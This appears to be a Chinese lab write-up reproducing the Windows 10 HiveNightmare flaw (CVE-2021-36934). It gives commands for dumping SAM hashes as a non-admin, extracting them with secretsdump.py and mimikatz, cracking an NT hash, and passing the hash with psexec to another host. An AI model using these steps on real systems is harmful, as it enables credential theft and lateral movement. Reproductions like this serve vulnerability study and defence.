CVE-2021-36934 漏洞复现

0x01 漏洞介绍

Windows 10 中允许以非管理员用户身份检索所有注册表配置单元。例如,这包括 SAM 中的哈希值,可用于以 SYSTEM 身份执行代码

0x02 漏洞利用前提

适用于所有受支持的 Windows 10 版本,其中启用了系统保护(在大多数配置中应默认启用)。

0x03 工具

提权工具:https://github.com/GossiTheDog/HiveNightmare

横向移动工具:https://github.com/SecureAuthCorp/impacket

mimikatz:https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210721/mimikatz_trunk.7z

0x04 漏洞复现

一、检查是否易受攻击

icacls C:\windows\system32\config\sam

如果输出 BUILTIN\Users:(I)(RX) 表示该系统易受攻击。

image-20210726001755841

如果输出 Access is denied 或拒绝访问表示该系统不易受攻击。

二、通过HiveNightmare.exe导出sam hash进行提权

1.查看当前用户

image-20210722110524258

运行exp,运行完成后会在桌面上生成三个文件

image-20210722110554580

查看转存下的文件

image-20210722111759248

2.解密凭证

将文件放到本地使用secretsdump.py进行解密,成功获取主机的hash

python3 secretsdump.py -sam SAM-haxx -system SYSTEM-haxx -security SECURITY-haxx LOCAL

image-20210722111617345

3.解密nthash

使用CMD5网站将nthash进行解密,成功获取明文密码

https://www.cmd5.com/

image-20210722112412113

4.横向移动

使用获取的hash进行横向移动

psexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 administrator@10.108.3.77

image-20210722204655643

psexec乱码解决办法chcp 65001

image-20210722204728847

三、通过mimkiatz导出sam hash进行提权

1.查看用户属性

普通账号下运行mimikatz并执行查看所有用户的属性

image-20210723104713269

2.导出shadowcopy volume

mimikatz # misc::shadowcopies 

image-20210723104742546

3.读取密码

mimikatz# lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskvolumeShadowcopy2\widows\system2\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskvolumeShadowcopy2\windows\system32\config\SAM

image-20210723104931959

附录

如果提示以下错误,可能是未开启系统保护(在大多数配置中应默认启用)

image-20210722112237092

开启系统保护的方法

1.点击配置

image-20210722111945998

2.点击配置,选择"启用系统保护"

image-20210722112006465

3.点击"创建"

image-20210722112020066

4.输入还原点的描述(随便输入即可)

image-20210722112037827

5.等待创建完成

image-20210722112048043

提示成功创建

image-20210722112148397